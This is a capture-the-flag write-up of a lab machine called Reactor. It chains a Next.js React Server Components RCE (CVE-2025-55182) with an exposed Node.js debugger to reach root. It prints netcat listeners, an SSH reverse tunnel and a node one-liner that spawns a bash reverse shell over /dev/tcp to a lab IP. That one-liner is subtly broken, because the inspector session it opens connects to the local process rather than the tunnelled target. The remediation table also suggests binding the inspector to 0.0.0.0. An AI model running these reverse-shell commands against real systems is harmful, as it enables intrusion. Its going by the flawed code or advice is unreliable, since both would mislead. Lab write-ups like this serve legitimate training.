HTB Reactor: CVE-2025-55182 + Node.js Debug RCE

Contenu protégé

Box HTB non-retired. Entre le mot de passe pour lire le writeup.

Introduction

Reactor is an Easy Linux machine centered around a Next.js web application. The attack chain chains a critical RCE vulnerability in React Server Components (CVE-2025-55182) for an initial foothold, followed by a Node.js debugging interface misconfiguration for privilege escalation to root.

Attack Overview

Nmap → Port 3000 (Next.js)
    ↓
CVE-2025-55182 → RCE via React Server Components payload
    ↓
Reverse shell as www-data
    ↓
Enumeration → Node.js debugger bound to 127.0.0.1:9229
    ↓
Port forwarding → Node Inspector
    ↓
Evaluate arbitrary JavaScript → spawn reverse shell as root

Reconnaissance

Nmap scan:

sudo nmap -sS -sV -sC 10.129.2.95

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.16
3000/tcp open  ppp?    [Next.js application]

Full port scan confirms only ports 22 and 3000. Add the hostname:

echo "10.129.2.95 reactor.htb" >> /etc/hosts

The web application at http://reactor.htb:3000 presents a ReactorWatch Core Monitoring System dashboard. Crawling with Katana reveals standard Next.js chunk structure but no additional endpoints.

Initial Access – CVE-2025-55182 (Next.js React Server Components RCE)

Vulnerability Overview

CVE-2025-55182 is a critical RCE vulnerability affecting Next.js versions that use React Server Components. The vulnerability allows an attacker to craft a malicious Server Action payload that bypasses input validation and leads to arbitrary code execution on the server.

Exploitation

A public proof-of-concept is used to generate a payload. Start a listener:

nc -lvnp 4444

Send the malicious request to the Next.js application. The payload executes a reverse shell as the www-data user.

whoami
# www-data

Upgrade to a proper TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation – Node.js Debugger RCE

Enumeration

Running ss -tlnp reveals a Node.js debugger bound to 127.0.0.1:9229:

ss -tlnp
# LISTEN 127.0.0.1:9229

The Node.js inspector allows remote code execution if accessible. From the www-data shell, create an SSH tunnel to forward the port:

# On target (www-data)
ssh -R 9229:127.0.0.1:9229 kali@10.10.14.237

On the attacker machine, connect to the Node.js debugger and evaluate JavaScript:

node -e "const inspector = require('inspector'); const client = new inspector.Session(); client.connect(); client.post('Runtime.evaluate', { expression: 'require(\"child_process\").exec(\"bash -c \\\"bash -i >& /dev/tcp/10.10.14.237/5555 0>&1\\\"\")' });"

Alternatively, use a tool like nodejs_eval.py. Start another listener:

nc -lvnp 5555

A reverse shell as root is received.

whoami
# root

Flags

User flag (found during enumeration):

[redacted]

Root flag:

[redacted]

Key Takeaways

Vulnerability	Root Cause	Remediation
CVE-2025-55182 (Next.js RCE)	React Server Components input validation bypass	Upgrade Next.js to patched version; disable Server Actions if not needed
Node.js debugger exposed	`--inspect` bound to localhost but accessible via local port forwarding	Bind debugger to a Unix socket or disable in production; use `--inspect=0.0.0.0:9229` only in development with proper firewall rules
SSH reverse port forwarding	www-data can create reverse SSH tunnels	Restrict SSH access for low-privileged users; use `AllowTcpForwarding no`

Resources

Nmap — Port scanning and service detection
Katana — Web crawling and JS discovery
CVE-2025-55182 PoC — Next.js React Server Components RCE
Node.js Inspector — Debugging and code evaluation API
ss — Socket statistics enumeration